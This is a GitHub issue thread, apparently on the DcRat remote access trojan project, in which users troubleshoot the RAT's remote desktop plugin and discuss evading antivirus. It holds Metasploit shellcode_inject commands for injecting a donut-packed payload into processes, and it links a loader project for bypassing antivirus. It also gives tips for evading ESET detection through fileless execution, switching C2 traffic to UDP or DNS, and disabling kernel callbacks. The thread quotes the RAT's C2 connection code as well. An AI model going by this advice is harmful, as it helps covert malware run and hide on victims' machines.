Closed qwer0123456 closed 3 years ago
I've tried donut,the problem maybe caused by the unsafe code.
https://github.com/qwqdanchun/DcRat/blob/main/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/UnsafeCodecs/UnsafeStreamCodec.cs
you will find some native code in remotedesktop.dll
maybe look at this project https://github.com/qwqdanchun/Bypass it shows how to code a loader to bypass av change the way of encryption, and enjoy it.
Unsafe code -> It is impossible to convert to safe code?
Can't fix it in UnsafeStreamCodec.cs?
The fileless technique I tested is
Compile it to a donut and run the command below
metasploit command
use post/windows/manage/shellcode_inject
set AUTOUNHOOK false
set CHANNELIZED false
set INTERACTIVE false
set pid 0
set shellcode /root/payload.bin
set session 1(number)
run
In the case of a quasar remote, view the screen possible
There seems to be something different
Sorry for what i say before. I make a payload.bin with donut ,and test with a c# loader and a c++ loader just now. both work well.So it may not because of the unsafe code.
Don't have msf on my pc, can't test the shellcode_inject module. Have you ever tried any shellcode loader?
You don't have to use Metasploit
You can also create thread after copying the donut compressed program to memory
Something that can be said for sure
quasar remote is view possible
I have no idea how to solve this problem
Thanks for the help
pid 0 runs notepad.exe -> new notepad process memory injection
You can also specify the pid
try to change the pid.
I find that this artical says"在注入进程时,发现注入到notepad.exe中无法执行,但注入到powershell中可以执行。" translated:"When the process is injected, it is found that injection into Notepad cannot be executed, but injection into PowerShell can be executed."
Process does not matter if the window session is the same process
explorer.exe,RuntimeBroker.exe,notepad.exe etc.. -> all impossible
Remote viewing of Quasar is possible
In UnsafeStreamCodec.cs, Quasar has several different parts.
I don't know why this is not possible from anync remote
try powershell,maybe because of the clr ?
can't find why it doesn't work
Quasar source works fine
This is the source with try and some additions
The screen is now displayed normally
############################################################
https://www.eset.com/us/home/free-trial/
eset antivirus msil/agent detect
eset detects unconditionally when connecting tcp socket
Do you know how to bypass eset tcp?
Screen output problem was solved lol
ClientSocket.cs
foreach (IPAddress theaddress in addresslist) { try { TcpClient.Connect(theaddress, ServerPort); // tcp connect eset anti virus detect if (TcpClient.Connected) break; } catch { } }
Thank you for your code. I'll push it later.
If you'd like to bypass tcp detect, may change it to udp or dns and so on
After install eset in VM. I test the rat. It didn't detect tcp when connect. Don't know why. However,sad to find many plugin may be detect. Maybe i should rewrite some plugin later.
not detected as exe execution
Memory area detection
Copy the donut-packed memory and create thread
Connect tcp in the created thread
detect memory tcp connect
Normal exe execution is not detected
Fileless technique bypasses 90% of antivirus
I am curious if there is any new detection technique
thank you
#############################################
Thanks for any hints on the screen viewing problem(unsafe code memory)
I don't know how to bypass eset
eset's scan is powerful. maybe it disable tcp connect from process like notepad?
this is my guess
For it didn't detect tcp connect when you just run it as exe
https://github.com/BlackINT3/OpenArk/releases/tag/v1.1.0
Obregistercallbacks in kernel
If you disable the loadimage kernel part to work with openark
Can't be detected
It seems to be detected if the running thread image address is not normal
Create thread and detect if the image address value is abnormal!
Good work!
However this is hard to bypass
usually you can't disable it in ring3
eset is like a good antivirus
If you load the drive with ring 0 it will probably be bypassed easily
From the general computer to the system privilege, you must also increase privileges and manipulate tokens
ring3 seems to need an idea
Thanks for the reply
Will the problem be solved?
localhost 192.168.0.1~255 vmware connection is fine
If you connect with an external IP, you cannot connect. (59.12.151.12 39.128.121.11)
Analyzing the source a little more,
Need more HWID and specific user ID?
remotedesktop.dll does not connect to the new port,
but In the case of file search, a new port connection is possible
The fileless technique is good
If this is resolved, there is also a willingness to donate
I don't know how to fix
If the issue is unrelated to the topic or cannot be fixed, please close the issue
Thank you